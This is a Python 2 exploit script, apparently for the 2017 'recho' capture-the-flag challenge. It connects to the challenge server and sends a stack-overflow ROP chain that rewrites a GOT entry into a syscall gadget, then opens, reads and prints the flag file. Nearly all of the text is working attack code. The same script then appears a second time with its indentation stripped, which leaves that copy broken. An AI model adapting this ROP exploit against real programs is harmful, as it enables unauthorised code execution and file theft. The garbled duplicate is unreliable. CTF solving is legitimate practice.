ymgve/recho_exploit.py

## recho_exploit.py
import socket, struct, os, binascii, base64
import telnetlib

def readline(sc, show = True):
    res = ""
    while len(res) == 0 or res[-1] != "\n":
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    if show:
        print repr(res[:-1])
    return res[:-1]

def read_until(sc, s):
    res = ""
    while not res.endswith(s):
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    return res[:-(len(s))]

def read_all(sc, n):
    data = ""
    while len(data) < n:
        block = sc.recv(n - len(data))
        if len(block) == 0:
            print repr(data)
            raise Exception("Server disconnected")
        data += block

    return data

def I(n):
    return struct.pack("<I", n)

def Q(n):
    return struct.pack("<Q", n)

def send_withlen(sc, data):
    size = str(len(data)).ljust(0x10, " ")
    sc.send(size)
    sc.send(data)

sc = socket.create_connection(("recho.2017.teamrois.cn", 9527))
# sc = socket.create_connection(("10.0.0.97", 12345))

add_al = Q(0x000000000040070D)
poprdi = Q(0x00000000004008A3)
ropmachine1 = Q(0x000000000040089A)
ropmachine2 = Q(0x0000000000400880)

got_write = Q(0x0000000000601018)
got_alarm = Q(0x0000000000601028)
got_read = Q(0x0000000000601030)
str_flag = Q(0x0000000000601058)

rop = "X" * 0x38
rop += ropmachine1 + Q(0) + Q(1) + got_write + Q(5) + Q(0x400000) + Q(1) + poprdi + Q(1) + ropmachine2
rop += Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + poprdi + got_alarm + add_al
rop += ropmachine1 + Q(0) + Q(1) + got_write + Q(2) + Q(0x400000) + Q(1) + poprdi + Q(1) + ropmachine2
rop += Q(0) + Q(0) + Q(1) + got_alarm + Q(0) + Q(0) + str_flag + poprdi + str_flag + ropmachine2
rop += Q(0) + Q(0) + Q(1) + got_read + Q(0x100) + Q(0x0000000000601100) + Q(3) + poprdi + Q(3) + ropmachine2
rop += Q(0) + Q(0) + Q(1) + got_write + Q(0x100) + Q(0x0000000000601100) + Q(1) + poprdi + Q(1) + ropmachine2

send_withlen(sc, rop)

sc.shutdown(socket.SHUT_WR)

read_until(sc, "XXXXXXXXXP")
res = sc.recv(8)
res = struct.unpack("<Q", res.ljust(8, "\x00"))[0]
print "qqqqq", hex(res)
# sc.send(str(0).ljust(0x10, " "))
# 0x0040070d

#sc.send("x")


# t = telnetlib.Telnet()
# t.sock = sc
# t.interact()

while True:
    data = sc.recv(16384)
    if len(data) == 0:
        break
    for line in data.split("\n"):
        print repr(line)
	import socket, struct, os, binascii, base64
	import telnetlib

	def readline(sc, show = True):
	res = ""
	while len(res) == 0 or res[-1] != "\n":
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	if show:
	print repr(res[:-1])
	return res[:-1]

	def read_until(sc, s):
	res = ""
	while not res.endswith(s):
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	return res[:-(len(s))]

	def read_all(sc, n):
	data = ""
	while len(data) < n:
	block = sc.recv(n - len(data))
	if len(block) == 0:
	print repr(data)
	raise Exception("Server disconnected")
	data += block

	return data

	def I(n):
	return struct.pack("<I", n)

	def Q(n):
	return struct.pack("<Q", n)

	def send_withlen(sc, data):
	size = str(len(data)).ljust(0x10, " ")
	sc.send(size)
	sc.send(data)

	sc = socket.create_connection(("recho.2017.teamrois.cn", 9527))
	# sc = socket.create_connection(("10.0.0.97", 12345))

	add_al = Q(0x000000000040070D)
	poprdi = Q(0x00000000004008A3)
	ropmachine1 = Q(0x000000000040089A)
	ropmachine2 = Q(0x0000000000400880)

	got_write = Q(0x0000000000601018)
	got_alarm = Q(0x0000000000601028)
	got_read = Q(0x0000000000601030)
	str_flag = Q(0x0000000000601058)

	rop = "X" * 0x38
	rop += ropmachine1 + Q(0) + Q(1) + got_write + Q(5) + Q(0x400000) + Q(1) + poprdi + Q(1) + ropmachine2
	rop += Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + Q(0) + poprdi + got_alarm + add_al
	rop += ropmachine1 + Q(0) + Q(1) + got_write + Q(2) + Q(0x400000) + Q(1) + poprdi + Q(1) + ropmachine2
	rop += Q(0) + Q(0) + Q(1) + got_alarm + Q(0) + Q(0) + str_flag + poprdi + str_flag + ropmachine2
	rop += Q(0) + Q(0) + Q(1) + got_read + Q(0x100) + Q(0x0000000000601100) + Q(3) + poprdi + Q(3) + ropmachine2
	rop += Q(0) + Q(0) + Q(1) + got_write + Q(0x100) + Q(0x0000000000601100) + Q(1) + poprdi + Q(1) + ropmachine2

	send_withlen(sc, rop)

	sc.shutdown(socket.SHUT_WR)

	read_until(sc, "XXXXXXXXXP")
	res = sc.recv(8)
	res = struct.unpack("<Q", res.ljust(8, "\x00"))[0]
	print "qqqqq", hex(res)
	# sc.send(str(0).ljust(0x10, " "))
	# 0x0040070d

	#sc.send("x")


	# t = telnetlib.Telnet()
	# t.sock = sc
	# t.interact()

	while True:
	data = sc.recv(16384)
	if len(data) == 0:
	break
	for line in data.split("\n"):
	print repr(line)